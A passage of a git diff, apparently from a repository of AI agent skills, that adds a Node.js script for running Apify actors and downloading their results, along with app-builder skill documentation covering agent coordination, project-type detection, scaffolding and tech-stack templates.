+ console.error(`Error: API request failed (${response.status}): ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ return {
+ runId: result.data.id,
+ datasetId: result.data.defaultDatasetId,
+ };
+}
+
+// Poll run status until complete or timeout
+async function pollUntilComplete(token, runId, timeout, interval) {
+ const url = `https://api.apify.com/v2/actor-runs/${runId}?token=${encodeURIComponent(token)}`;
+ const startTime = Date.now();
+ let lastStatus = null;
+
+ while (true) {
+ const response = await fetch(url);
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to get run status: ${text}`);
+ process.exit(1);
+ }
+
+ const result = await response.json();
+ const status = result.data.status;
+
+ // Only print when status changes
+ if (status !== lastStatus) {
+ console.log(`Status: ${status}`);
+ lastStatus = status;
+ }
+
+ if (['SUCCEEDED', 'FAILED', 'ABORTED', 'TIMED-OUT'].includes(status)) {
+ return status;
+ }
+
+ const elapsed = (Date.now() - startTime) / 1000;
+ if (elapsed > timeout) {
+ console.error(`Warning: Timeout after ${timeout}s, actor still running`);
+ return 'TIMED-OUT';
+ }
+
+ await sleep(interval * 1000);
+ }
+}
+
+// Download dataset items
+async function downloadResults(token, datasetId, outputPath, format) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/download_${format}`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+
+ if (format === 'json') {
+ writeFileSync(outputPath, JSON.stringify(data, null, 2));
+ } else {
+ // CSV output
+ if (data.length > 0) {
+ const fieldnames = Object.keys(data[0]);
+ const csvLines = [fieldnames.join(',')];
+
+ for (const row of data) {
+ const values = fieldnames.map((key) => {
+ let value = row[key];
+
+ // Truncate long text fields
+ if (typeof value === 'string' && value.length > 200) {
+ value = value.slice(0, 200) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ value = JSON.stringify(value) || '';
+ }
+
+ // CSV escape: wrap in quotes if contains comma, quote, or newline
+ if (value === null || value === undefined) {
+ return '';
+ }
+ const strValue = String(value);
+ if (strValue.includes(',') || strValue.includes('"') || strValue.includes('\n')) {
+ return `"${strValue.replace(/"/g, '""')}"`;
+ }
+ return strValue;
+ });
+ csvLines.push(values.join(','));
+ }
+
+ writeFileSync(outputPath, csvLines.join('\n'));
+ } else {
+ writeFileSync(outputPath, '');
+ }
+ }
+
+ console.log(`Saved to: ${outputPath}`);
+}
+
+// Display top 5 results in chat format
+async function displayQuickAnswer(token, datasetId) {
+ const url = `https://api.apify.com/v2/datasets/${datasetId}/items?token=${encodeURIComponent(token)}&format=json`;
+
+ const response = await fetch(url, {
+ headers: {
+ 'User-Agent': `${USER_AGENT}/quick_answer`,
+ },
+ });
+
+ if (!response.ok) {
+ const text = await response.text();
+ console.error(`Error: Failed to download results: ${text}`);
+ process.exit(1);
+ }
+
+ const data = await response.json();
+ const total = data.length;
+
+ if (total === 0) {
+ console.log('\nNo results found.');
+ return;
+ }
+
+ // Display top 5
+ console.log(`\n${'='.repeat(60)}`);
+ console.log(`TOP 5 RESULTS (of ${total} total)`);
+ console.log('='.repeat(60));
+
+ for (let i = 0; i < Math.min(5, data.length); i++) {
+ const item = data[i];
+ console.log(`\n--- Result ${i + 1} ---`);
+
+ for (const [key, value] of Object.entries(item)) {
+ let displayValue = value;
+
+ // Truncate long values
+ if (typeof value === 'string' && value.length > 100) {
+ displayValue = value.slice(0, 100) + '...';
+ } else if (Array.isArray(value) || (typeof value === 'object' && value !== null)) {
+ const jsonStr = JSON.stringify(value);
+ displayValue = jsonStr.length > 100 ? jsonStr.slice(0, 100) + '...' : jsonStr;
+ }
+
+ console.log(` ${key}: ${displayValue}`);
+ }
+ }
+
+ console.log(`\n${'='.repeat(60)}`);
+ if (total > 5) {
+ console.log(`Showing 5 of ${total} results.`);
+ }
+ console.log(`Full data available at: https://console.apify.com/storage/datasets/${datasetId}`);
+ console.log('='.repeat(60));
+}
+
+// Report summary of downloaded data
+function reportSummary(outputPath, format) {
+ const stats = statSync(outputPath);
+ const size = stats.size;
+
+ let count;
+ try {
+ const content = require('fs').readFileSync(outputPath, 'utf-8');
+ if (format === 'json') {
+ const data = JSON.parse(content);
+ count = Array.isArray(data) ? data.length : 1;
+ } else {
+ // CSV - count lines minus header
+ const lines = content.split('\n').filter((line) => line.trim());
+ count = Math.max(0, lines.length - 1);
+ }
+ } catch {
+ count = 'unknown';
+ }
+
+ console.log(`Records: ${count}`);
+ console.log(`Size: ${size.toLocaleString()} bytes`);
+}
+
+// Helper: sleep for ms
+function sleep(ms) {
+ return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// Main function
+async function main() {
+ // Parse args first so --help works without token
+ const args = parseCliArgs();
+
+ // Check for APIFY_TOKEN
+ const token = process.env.APIFY_TOKEN;
+ if (!token) {
+ console.error('Error: APIFY_TOKEN not found in .env file');
+ console.error('');
+ console.error('Add your token to .env file:');
+ console.error(' APIFY_TOKEN=your_token_here');
+ console.error('');
+ console.error('Get your token: https://console.apify.com/account/integrations');
+ process.exit(1);
+ }
+
+ // Start the actor run
+ console.log(`Starting actor: ${args.actor}`);
+ const { runId, datasetId } = await startActor(token, args.actor, args.input);
+ console.log(`Run ID: ${runId}`);
+ console.log(`Dataset ID: ${datasetId}`);
+
+ // Poll for completion
+ const status = await pollUntilComplete(token, runId, args.timeout, args.pollInterval);
+
+ if (status !== 'SUCCEEDED') {
+ console.error(`Error: Actor run ${status}`);
+ console.error(`Details: https://console.apify.com/actors/runs/${runId}`);
+ process.exit(1);
+ }
+
+ // Determine output mode
+ if (args.output) {
+ // File output mode
+ await downloadResults(token, datasetId, args.output, args.format);
+ reportSummary(args.output, args.format);
+ } else {
+ // Quick answer mode - display in chat
+ await displayQuickAnswer(token, datasetId);
+ }
+}
+
+main().catch((err) => {
+ console.error(`Error: ${err.message}`);
+ process.exit(1);
+});
diff --git a/web-app/public/skills/app-builder/SKILL.md b/web-app/public/skills/app-builder/SKILL.md
index 5474dd63..ea04a6a1 100644
--- a/web-app/public/skills/app-builder/SKILL.md
+++ b/web-app/public/skills/app-builder/SKILL.md
@@ -1,9 +1,9 @@
---
name: app-builder
description: "Main application building orchestrator. Creates full-stack applications from natural language requests. Determines project type, selects tech stack, coordinates agents."
-allowed-tools: Read, Write, Edit, Glob, Grep, Bash, Agent
risk: unknown
source: community
+date_added: "2026-02-27"
---
# App Builder - Application Building Orchestrator
diff --git a/web-app/public/skills/app-builder/agent-coordination.md b/web-app/public/skills/app-builder/agent-coordination.md
new file mode 100644
index 00000000..e8a07faf
--- /dev/null
+++ b/web-app/public/skills/app-builder/agent-coordination.md
@@ -0,0 +1,71 @@
+# Agent Coordination
+
+> How App Builder orchestrates specialist agents.
+
+## Agent Pipeline
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│ APP BUILDER (Orchestrator) │
+└─────────────────────────────────────────────────────────────┘
+ │
+ ▼
+┌─────────────────────────────────────────────────────────────┐
+│ PROJECT PLANNER │
+│ • Task breakdown │
+│ • Dependency graph │
+│ • File structure planning │
+│ • Create {task-slug}.md in project root (MANDATORY) │
+└─────────────────────────────────────────────────────────────┘
+ │
+ ▼
+┌─────────────────────────────────────────────────────────────┐
+│ CHECKPOINT: PLAN VERIFICATION │
+│ 🔴 VERIFY: Does {task-slug}.md exist in project root? │
+│ 🔴 If NO → STOP → Create plan file first │
+│ 🔴 If YES → Proceed to specialist agents │
+└─────────────────────────────────────────────────────────────┘
+ │
+ ┌───────────────────┼───────────────────┐
+ ▼ ▼ ▼
+┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐
+│ DATABASE │ │ BACKEND │ │ FRONTEND │
+│ ARCHITECT │ │ SPECIALIST │ │ SPECIALIST │
+│ │ │ │ │ │
+│ • Schema design │ │ • API routes │ │ • Components │
+│ • Migrations │ │ • Controllers │ │ • Pages │
+│ • Seed data │ │ • Middleware │ │ • Styling │
+└─────────────────┘ └─────────────────┘ └─────────────────┘
+ │ │ │
+ └───────────────────┼───────────────────┘
+ ▼
+┌─────────────────────────────────────────────────────────────┐
+│ PARALLEL PHASE (Optional) │
+│ • Security Auditor → Vulnerability check │
+│ • Test Engineer → Unit tests │
+│ • Performance Optimizer → Bundle analysis │
+└─────────────────────────────────────────────────────────────┘
+ │
+ ▼
+┌─────────────────────────────────────────────────────────────┐
+│ DEVOPS ENGINEER │
+│ • Environment setup │
+│ • Preview deployment │
+│ • Health check │
+└─────────────────────────────────────────────────────────────┘
+```
+
+## Execution Order
+
+| Phase | Agent(s) | Parallel? | Prerequisite | CHECKPOINT |
+|-------|----------|-----------|--------------|------------|
+| 0 | Socratic Gate | ❌ | - | ✅ Ask 3 questions |
+| 1 | Project Planner | ❌ | Questions answered | ✅ **PLAN.md created** |
+| 1.5 | **PLAN VERIFICATION** | ❌ | PLAN.md exists | ✅ **File exists in root** |
+| 2 | Database Architect | ❌ | Plan ready | Schema defined |
+| 3 | Backend Specialist | ❌ | Schema ready | API routes created |
+| 4 | Frontend Specialist | ✅ | API ready (partial) | UI components ready |
+| 5 | Security Auditor, Test Engineer | ✅ | Code ready | Tests & audit pass |
+| 6 | DevOps Engineer | ❌ | All code ready | Deployment ready |
+
+> 🔴 **CRITICAL:** Phase 1.5 is MANDATORY. No specialist agents proceed without PLAN.md verification.
diff --git a/web-app/public/skills/app-builder/feature-building.md b/web-app/public/skills/app-builder/feature-building.md
new file mode 100644
index 00000000..7bacb0b8
--- /dev/null
+++ b/web-app/public/skills/app-builder/feature-building.md
@@ -0,0 +1,53 @@
+# Feature Building
+
+> How to analyze and implement new features.
+
+## Feature Analysis
+
+```
+Request: "add payment system"
+
+Analysis:
+├── Required Changes:
+│ ├── Database: orders, payments tables
+│ ├── Backend: /api/checkout, /api/webhooks/stripe
+│ ├── Frontend: CheckoutForm, PaymentSuccess
+│ └── Config: Stripe API keys
+│
+├── Dependencies:
+│ ├── stripe package
+│ └── Existing user authentication
+│
+└── Estimated Time: 15-20 minutes
+```
+
+## Iterative Enhancement Process
+
+```
+1. Analyze existing project
+2. Create change plan
+3. Present plan to user
+4. Get approval
+5. Apply changes
+6. Test
+7. Show preview
+```
+
+## Error Handling
+
+| Error Type | Solution Strategy |
+|------------|-------------------|
+| TypeScript Error | Fix type, add missing import |
+| Missing Dependency | Run npm install |
+| Port Conflict | Suggest alternative port |
+| Database Error | Check migration, validate connection |
+
+## Recovery Strategy
+
+```
+1. Detect error
+2. Try automatic fix
+3. If failed, report to user
+4. Suggest alternative
+5. Rollback if necessary
+```
diff --git a/web-app/public/skills/app-builder/project-detection.md b/web-app/public/skills/app-builder/project-detection.md
new file mode 100644
index 00000000..ea06187a
--- /dev/null
+++ b/web-app/public/skills/app-builder/project-detection.md
@@ -0,0 +1,34 @@
+# Project Type Detection
+
+> Analyze user requests to determine project type and template.
+
+## Keyword Matrix
+
+| Keywords | Project Type | Template |
+|----------|--------------|----------|
+| blog, post, article | Blog | astro-static |
+| e-commerce, product, cart, payment | E-commerce | nextjs-saas |
+| dashboard, panel, management | Admin Dashboard | nextjs-fullstack |
+| api, backend, service, rest | API Service | express-api |
+| python, fastapi, django | Python API | python-fastapi |
+| mobile, android, ios, react native | Mobile App (RN) | react-native-app |
+| flutter, dart | Mobile App (Flutter) | flutter-app |
+| portfolio, personal, cv | Portfolio | nextjs-static |
+| crm, customer, sales | CRM | nextjs-fullstack |
+| saas, subscription, stripe | SaaS | nextjs-saas |
+| landing, promotional, marketing | Landing Page | nextjs-static |
+| docs, documentation | Documentation | astro-static |
+| extension, plugin, chrome | Browser Extension | chrome-extension |
+| desktop, electron | Desktop App | electron-desktop |
+| cli, command line, terminal | CLI Tool | cli-tool |
+| monorepo, workspace | Monorepo | monorepo-turborepo |
+
+## Detection Process
+
+```
+1. Tokenize user request
+2. Extract keywords
+3. Determine project type
+4. Detect missing information → forward to conversation-manager
+5. Suggest tech stack
+```
diff --git a/web-app/public/skills/app-builder/scaffolding.md b/web-app/public/skills/app-builder/scaffolding.md
new file mode 100644
index 00000000..35bba8a1
--- /dev/null
+++ b/web-app/public/skills/app-builder/scaffolding.md
@@ -0,0 +1,118 @@
+# Project Scaffolding
+
+> Directory structure and core files for new projects.
+
+---
+
+## Next.js Full-Stack Structure (2025 Optimized)
+
+```
+project-name/
+├── src/
+│ ├── app/ # Routes only (thin layer)
+│ │ ├── layout.tsx
+│ │ ├── page.tsx
+│ │ ├── globals.css
+│ │ ├── (auth)/ # Route group - auth pages
+│ │ │ ├── login/page.tsx
+│ │ │ └── register/page.tsx
+│ │ ├── (dashboard)/ # Route group - dashboard layout
+│ │ │ ├── layout.tsx
+│ │ │ └── page.tsx
+│ │ └── api/
+│ │ └── [resource]/route.ts
+│ │
+│ ├── features/ # Feature-based modules
+│ │ ├── auth/
+│ │ │ ├── components/
+│ │ │ ├── hooks/
+│ │ │ ├── actions.ts # Server Actions
+│ │ │ ├── queries.ts # Data fetching
+│ │ │ └── types.ts
+│ │ ├── products/
+│ │ │ ├── components/
+│ │ │ ├── actions.ts
+│ │ │ └── queries.ts
+│ │ └── cart/
+│ │ └── ...
+│ │
+│ ├── shared/ # Shared utilities
+│ │ ├── components/ui/ # Reusable UI components
+│ │ ├── lib/ # Utils, helpers
+│ │ └── hooks/ # Global hooks
+│ │
+│ └── server/ # Server-only code
+│ ├── db/ # Database client (Prisma)
+│ ├── auth/ # Auth config
+│ └── services/ # External API integrations
+│
+├── prisma/
+│ ├── schema.prisma
+│ ├── migrations/
+│ └── seed.ts
+│
+├── public/
+├── .env.example
+├── .env.local
+├── package.json
+├── tailwind.config.ts
+├── tsconfig.json
+└── README.md
+```
+
+---
+
+## Structure Principles
+
+| Principle | Implementation |
+|-----------|----------------|
+| **Feature isolation** | Each feature in `features/` with its own components, hooks, actions |
+| **Server/Client separation** | Server-only code in `server/`, prevents accidental client imports |
+| **Thin routes** | `app/` only for routing, logic lives in `features/` |
+| **Route groups** | `(groupName)/` for layout sharing without URL impact |
+| **Shared code** | `shared/` for truly reusable UI and utilities |
+
+---
+
+## Core Files
+
+| File | Purpose |
+|------|---------|
+| `package.json` | Dependencies |
+| `tsconfig.json` | TypeScript + path aliases (`@/features/*`) |
+| `tailwind.config.ts` | Tailwind config |
+| `.env.example` | Environment template |
+| `README.md` | Project documentation |
+| `.gitignore` | Git ignore rules |
+| `prisma/schema.prisma` | Database schema |
+
+---
+
+## Path Aliases (tsconfig.json)
+
+```json
+{
+ "compilerOptions": {
+ "paths": {
+ "@/*": ["./src/*"],
+ "@/features/*": ["./src/features/*"],
+ "@/shared/*": ["./src/shared/*"],
+ "@/server/*": ["./src/server/*"]
+ }
+ }
+}
+```
+
+---
+
+## When to Use What
+
+| Need | Location |
+|------|----------|
+| New page/route | `app/(group)/page.tsx` |
+| Feature component | `features/[name]/components/` |
+| Server action | `features/[name]/actions.ts` |
+| Data fetching | `features/[name]/queries.ts` |
+| Reusable button/input | `shared/components/ui/` |
+| Database query | `server/db/` |
+| External API call | `server/services/` |
diff --git a/web-app/public/skills/app-builder/tech-stack.md b/web-app/public/skills/app-builder/tech-stack.md
new file mode 100644
index 00000000..439299cb
--- /dev/null
+++ b/web-app/public/skills/app-builder/tech-stack.md
@@ -0,0 +1,40 @@
+# Tech Stack Selection (2025)
+
+> Default and alternative technology choices for web applications.
+
+## Default Stack (Web App - 2025)
+
+```yaml
+Frontend:
+ framework: Next.js 16 (Stable)
+ language: TypeScript 5.7+
+ styling: Tailwind CSS v4
+ state: React 19 Actions / Server Components
+ bundler: Turbopack (Stable for Dev)
+
+Backend:
+ runtime: Node.js 23
+ framework: Next.js API Routes / Hono (for Edge)
+ validation: Zod / TypeBox
+
+Database:
+ primary: PostgreSQL
+ orm: Prisma / Drizzle
+ hosting: Supabase / Neon
+
+Auth:
+ provider: Auth.js (v5) / Clerk
+
+Monorepo:
+ tool: Turborepo 2.0
+```
+
+## Alternative Options
+
+| Need | Default | Alternative |
+|------|---------|-------------|
+| Real-time | - | Supabase Realtime, Socket.io |
+| File storage | - | Cloudinary, S3 |
+| Payment | Stripe | LemonSqueezy, Paddle |
+| Email | - | Resend, SendGrid |
+| Search | - | Algolia, Typesense |
diff --git a/web-app/public/skills/app-builder/templates/SKILL.md b/web-app/public/skills/app-builder/templates/SKILL.md
index b971cd8f..e7d796f1 100644
--- a/web-app/public/skills/app-builder/templates/SKILL.md
+++ b/web-app/public/skills/app-builder/templates/SKILL.md
@@ -1,9 +1,9 @@
---
name: templates
description: "Project scaffolding templates for new applications. Use when creating new projects from scratch. Contains 12 templates for various tech stacks."
-allowed-tools: Read, Glob, Grep
risk: unknown
source: community
+date_added: "2026-02-27"
---
# Project Templates
diff --git a/web-app/public/skills/app-builder/templates/astro-static/TEMPLATE.md b/web-app/public/skills/app-builder/templates/astro-static/TEMPLATE.md
new file mode 100644
index 00000000..cd14084c
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/astro-static/TEMPLATE.md
@@ -0,0 +1,76 @@
+---
+name: astro-static
+description: Astro static site template principles. Content-focused websites, blogs, documentation.
+---
+
+# Astro Static Site Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Framework | Astro 4.x |
+| Content | MDX + Content Collections |
+| Styling | Tailwind CSS |
+| Integrations | Sitemap, RSS, SEO |
+| Output | Static/SSG |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── src/
+│ ├── components/ # .astro components
+│ ├── content/ # MDX content
+│ │ ├── blog/
+│ │ └── config.ts # Collection schemas
+│ ├── layouts/ # Page layouts
+│ ├── pages/ # File-based routing
+│ └── styles/
+├── public/ # Static assets
+├── astro.config.mjs
+└── package.json
+```
+
+---
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| Content Collections | Type-safe content with Zod schemas |
+| Islands Architecture | Partial hydration for interactivity |
+| Zero JS by default | Static HTML unless needed |
+| MDX Support | Markdown with components |
+
+---
+
+## Setup Steps
+
+1. `npm create astro@latest {{name}}`
+2. Add integrations: `npx astro add mdx tailwind sitemap`
+3. Configure `astro.config.mjs`
+4. Create content collections
+5. `npm run dev`
+
+---
+
+## Deployment
+
+| Platform | Method |
+|----------|--------|
+| Vercel | Auto-detected |
+| Netlify | Auto-detected |
+| Cloudflare Pages | Auto-detected |
+| GitHub Pages | Build + deploy action |
+
+---
+
+## Best Practices
+
+- Use Content Collections for type safety
+- Leverage static generation
+- Add islands only where needed
+- Optimize images with Astro Image
diff --git a/web-app/public/skills/app-builder/templates/chrome-extension/TEMPLATE.md b/web-app/public/skills/app-builder/templates/chrome-extension/TEMPLATE.md
new file mode 100644
index 00000000..18cdc9e4
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/chrome-extension/TEMPLATE.md
@@ -0,0 +1,92 @@
+---
+name: chrome-extension
+description: Chrome Extension template principles. Manifest V3, React, TypeScript.
+---
+
+# Chrome Extension Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Manifest | V3 |
+| UI | React 18 |
+| Language | TypeScript |
+| Styling | Tailwind CSS |
+| Bundler | Vite |
+| Storage | Chrome Storage API |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── src/
+│ ├── popup/ # Extension popup
+│ ├── options/ # Options page
+│ ├── background/ # Service worker
+│ ├── content/ # Content scripts
+│ ├── components/
+│ ├── hooks/
+│ └── lib/
+│ ├── storage.ts # Chrome storage helpers
+│ └── messaging.ts # Message passing
+├── public/
+│ ├── icons/
+│ └── manifest.json
+└── package.json
+```
+
+---
+
+## Manifest V3 Concepts
+
+| Component | Purpose |
+|-----------|---------|
+| Service Worker | Background processing |
+| Content Scripts | Page injection |
+| Popup | User interface |
+| Options Page | Settings |
+
+---
+
+## Permissions
+
+| Permission | Use |
+|------------|-----|
+| storage | Save user data |
+| activeTab | Current tab access |
+| scripting | Inject scripts |
+| host_permissions | Site access |
+
+---
+
+## Setup Steps
+
+1. `npm create vite {{name}} -- --template react-ts`
+2. Add Chrome types: `npm install -D @types/chrome`
+3. Configure Vite for multi-entry
+4. Create manifest.json
+5. `npm run dev` (watch mode)
+6. Load in Chrome: `chrome://extensions` → Load unpacked
+
+---
+
+## Development Tips
+
+| Task | Method |
+|------|--------|
+| Debug Popup | Right-click icon → Inspect |
+| Debug Background | Extensions page → Service worker |
+| Debug Content | DevTools console on page |
+| Hot Reload | `npm run dev` with watch |
+
+---
+
+## Best Practices
+
+- Use type-safe messaging
+- Wrap Chrome APIs in promises
+- Minimize permissions
+- Handle offline gracefully
diff --git a/web-app/public/skills/app-builder/templates/cli-tool/TEMPLATE.md b/web-app/public/skills/app-builder/templates/cli-tool/TEMPLATE.md
new file mode 100644
index 00000000..5011162c
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/cli-tool/TEMPLATE.md
@@ -0,0 +1,88 @@
+---
+name: cli-tool
+description: Node.js CLI tool template principles. Commander.js, interactive prompts.
+---
+
+# CLI Tool Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Runtime | Node.js 20+ |
+| Language | TypeScript |
+| CLI Framework | Commander.js |
+| Prompts | Inquirer.js |
+| Output | chalk + ora |
+| Config | cosmiconfig |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── src/
+│ ├── index.ts # Entry point
+│ ├── cli.ts # CLI setup
+│ ├── commands/ # Command handlers
+│ ├── lib/
+│ │ ├── config.ts # Config loader
+│ │ └── logger.ts # Styled output
+│ └── types/
+├── bin/
+│ └── cli.js # Executable
+└── package.json
+```
+
+---
+
+## CLI Design Principles
+
+| Principle | Description |
+|-----------|-------------|
+| Subcommands | Group related actions |
+| Options | Flags with defaults |
+| Interactive | Prompts when needed |
+| Non-interactive | Support --yes flags |
+
+---
+
+## Key Components
+
+| Component | Purpose |
+|-----------|---------|
+| Commander | Command parsing |
+| Inquirer | Interactive prompts |
+| Chalk | Colored output |
+| Ora | Spinners/loading |
+| Cosmiconfig | Config file discovery |
+
+---
+
+## Setup Steps
+
+1. Create project directory
+2. `npm init -y`
+3. Install deps: `npm install commander @inquirer/prompts chalk ora cosmiconfig`
+4. Configure bin in package.json
+5. `npm link` for local testing
+
+---
+
+## Publishing
+
+```bash
+npm login
+npm publish
+```
+
+---
+
+## Best Practices
+
+- Provide helpful error messages
+- Support both interactive and non-interactive modes
+- Use consistent output styling
+- Validate inputs with Zod
+- Exit with proper codes (0 success, 1 error)
diff --git a/web-app/public/skills/app-builder/templates/electron-desktop/TEMPLATE.md b/web-app/public/skills/app-builder/templates/electron-desktop/TEMPLATE.md
new file mode 100644
index 00000000..cc65c97b
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/electron-desktop/TEMPLATE.md
@@ -0,0 +1,88 @@
+---
+name: electron-desktop
+description: Electron desktop app template principles. Cross-platform, React, TypeScript.
+---
+
+# Electron Desktop App Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Framework | Electron 28+ |
+| UI | React 18 |
+| Language | TypeScript |
+| Styling | Tailwind CSS |
+| Bundler | Vite + electron-builder |
+| IPC | Type-safe communication |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── electron/
+│ ├── main.ts # Main process
+│ ├── preload.ts # Preload script
+│ └── ipc/ # IPC handlers
+├── src/
+│ ├── App.tsx
+│ ├── components/
+│ │ ├── TitleBar.tsx # Custom title bar
+│ │ └── ...
+│ └── hooks/
+├── public/
+└── package.json
+```
+
+---
+
+## Process Model
+
+| Process | Role |
+|---------|------|
+| Main | Node.js, system access |
+| Renderer | Chromium, React UI |
+| Preload | Bridge, context isolation |
+
+---
+
+## Key Concepts
+
+| Concept | Purpose |
+|---------|---------|
+| contextBridge | Safe API exposure |
+| ipcMain/ipcRenderer | Process communication |
+| nodeIntegration: false | Security |
+| contextIsolation: true | Security |
+
+---
+
+## Setup Steps
+
+1. `npm create vite {{name}} -- --template react-ts`
+2. Install: `npm install -D electron electron-builder vite-plugin-electron`
+3. Create electron/ directory
+4. Configure main process
+5. `npm run electron:dev`
+
+---
+
+## Build Targets
+
+| Platform | Output |
+|----------|--------|
+| Windows | NSIS, Portable |
+| macOS | DMG, ZIP |
+| Linux | AppImage, DEB |
+
+---
+
+## Best Practices
+
+- Use preload script for main/renderer bridge
+- Type-safe IPC with typed handlers
+- Custom title bar for native feel
+- Handle window state (maximize, minimize)
+- Auto-updates with electron-updater
diff --git a/web-app/public/skills/app-builder/templates/express-api/TEMPLATE.md b/web-app/public/skills/app-builder/templates/express-api/TEMPLATE.md
new file mode 100644
index 00000000..738d036f
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/express-api/TEMPLATE.md
@@ -0,0 +1,83 @@
+---
+name: express-api
+description: Express.js REST API template principles. TypeScript, Prisma, JWT.
+---
+
+# Express.js API Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Runtime | Node.js 20+ |
+| Framework | Express.js |
+| Language | TypeScript |
+| Database | PostgreSQL + Prisma |
+| Validation | Zod |
+| Auth | JWT + bcrypt |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── prisma/
+│ └── schema.prisma
+├── src/
+│ ├── app.ts # Express setup
+│ ├── config/ # Environment
+│ ├── routes/ # Route handlers
+│ ├── controllers/ # Business logic
+│ ├── services/ # Data access
+│ ├── middleware/
+│ │ ├── auth.ts # JWT verify
+│ │ ├── error.ts # Error handler
+│ │ └── validate.ts # Zod validation
+│ ├── schemas/ # Zod schemas
+│ └── utils/
+└── package.json
+```
+
+---
+
+## Middleware Stack
+
+| Order | Middleware |
+|-------|------------|
+| 1 | helmet (security) |
+| 2 | cors |
+| 3 | morgan (logging) |
+| 4 | body parsing |
+| 5 | routes |
+| 6 | error handler |
+
+---
+
+## API Response Format
+
+| Type | Structure |
+|------|-----------|
+| Success | `{ success: true, data: {...} }` |
+| Error | `{ error: "message", details: [...] }` |
+
+---
+
+## Setup Steps
+
+1. Create project directory
+2. `npm init -y`
+3. Install deps: `npm install express prisma zod bcrypt jsonwebtoken`
+4. Configure Prisma
+5. `npm run db:push`
+6. `npm run dev`
+
+---
+
+## Best Practices
+
+- Layer architecture (routes → controllers → services)
+- Validate all inputs with Zod
+- Centralized error handling
+- Environment-based config
+- Use Prisma for type-safe DB access
diff --git a/web-app/public/skills/app-builder/templates/flutter-app/TEMPLATE.md b/web-app/public/skills/app-builder/templates/flutter-app/TEMPLATE.md
new file mode 100644
index 00000000..f86b8bc1
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/flutter-app/TEMPLATE.md
@@ -0,0 +1,90 @@
+---
+name: flutter-app
+description: Flutter mobile app template principles. Riverpod, Go Router, clean architecture.
+---
+
+# Flutter App Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Framework | Flutter 3.x |
+| Language | Dart 3.x |
+| State | Riverpod 2.0 |
+| Navigation | Go Router |
+| HTTP | Dio |
+| Storage | Hive |
+
+---
+
+## Directory Structure
+
+```
+project_name/
+├── lib/
+│ ├── main.dart
+│ ├── app.dart
+│ ├── core/
+│ │ ├── constants/
+│ │ ├── theme/
+│ │ ├── router/
+│ │ └── utils/
+│ ├── features/
+│ │ ├── auth/
+│ │ │ ├── data/
+│ │ │ ├── domain/
+│ │ │ └── presentation/
+│ │ └── home/
+│ ├── shared/
+│ │ ├── widgets/
+│ │ └── providers/
+│ └── services/
+│ ├── api/
+│ └── storage/
+├── test/
+└── pubspec.yaml
+```
+
+---
+
+## Architecture Layers
+
+| Layer | Contents |
+|-------|----------|
+| Presentation | Screens, Widgets, Providers |
+| Domain | Entities, Use Cases |
+| Data | Repositories, Models |
+
+---
+
+## Key Packages
+
+| Package | Purpose |
+|---------|---------|
+| flutter_riverpod | State management |
+| riverpod_annotation | Code generation |
+| go_router | Navigation |
+| dio | HTTP client |
+| freezed | Immutable models |
+| hive | Local storage |
+
+---
+
+## Setup Steps
+
+1. `flutter create {{name}} --org com.{{bundle}}`
+2. Update `pubspec.yaml`
+3. `flutter pub get`
+4. Run code generation: `dart run build_runner build`
+5. `flutter run`
+
+---
+
+## Best Practices
+
+- Feature-first folder structure
+- Riverpod for state, React Query pattern for server state
+- Freezed for immutable data classes
+- Go Router for declarative navigation
+- Material 3 theming
diff --git a/web-app/public/skills/app-builder/templates/monorepo-turborepo/TEMPLATE.md b/web-app/public/skills/app-builder/templates/monorepo-turborepo/TEMPLATE.md
new file mode 100644
index 00000000..b47d5b35
--- /dev/null
+++ b/web-app/public/skills/app-builder/templates/monorepo-turborepo/TEMPLATE.md
@@ -0,0 +1,90 @@
+---
+name: monorepo-turborepo
+description: Turborepo monorepo template principles. pnpm workspaces, shared packages.
+---
+
+# Turborepo Monorepo Template
+
+## Tech Stack
+
+| Component | Technology |
+|-----------|------------|
+| Build System | Turborepo |
+| Package Manager | pnpm |
+| Apps | Next.js, Express |
+| Packages | Shared UI, Config, Types |
+| Language | TypeScript |
+
+---
+
+## Directory Structure
+
+```
+project-name/
+├── apps/
+│ ├── web/ # Next.js app
+│ ├── api/ # Express API
+│ └── docs/ # Documentation
+├── packages/
+│ ├── ui/ # Shared components
+│ ├── config/ # ESLint, TS, Tailwind
+│ ├── types/ # Shared types
+│ └── utils/ # Shared utilities
+├── turbo.json
+├── pnpm-workspace.yaml
+└── package.json
+```
+
+---
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| Workspaces | pnpm-workspace.yaml |
+| Pipeline | turbo.json task graph |
+| Caching | Remote/local task caching |
+| Dependencies | `workspace:*` protocol |
+
+---
+
+## Turbo Pipeline
+
+| Task | Depends On |
+|------|------------|
+| build | ^build (dependencies first) |
